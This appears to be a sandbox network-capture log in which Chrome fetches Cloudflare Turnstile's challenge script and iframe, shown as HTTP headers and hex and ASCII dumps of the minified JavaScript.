                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                                  Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                                  Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                                  2024-12-18 19:27:46 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  5192.168.2.1649714104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:48 GMT
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 47692
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                                                  last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418d689bfd4343-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                  Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                  Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                                  Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                                  Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                                  Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                                  Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                                  Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  6192.168.2.1649713104.18.95.414436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC809OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4r65z/0x4AAAAAAA3CjQARFbjEVtU4/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                  Referer: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:27:48 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:27:48 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Length: 26678
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
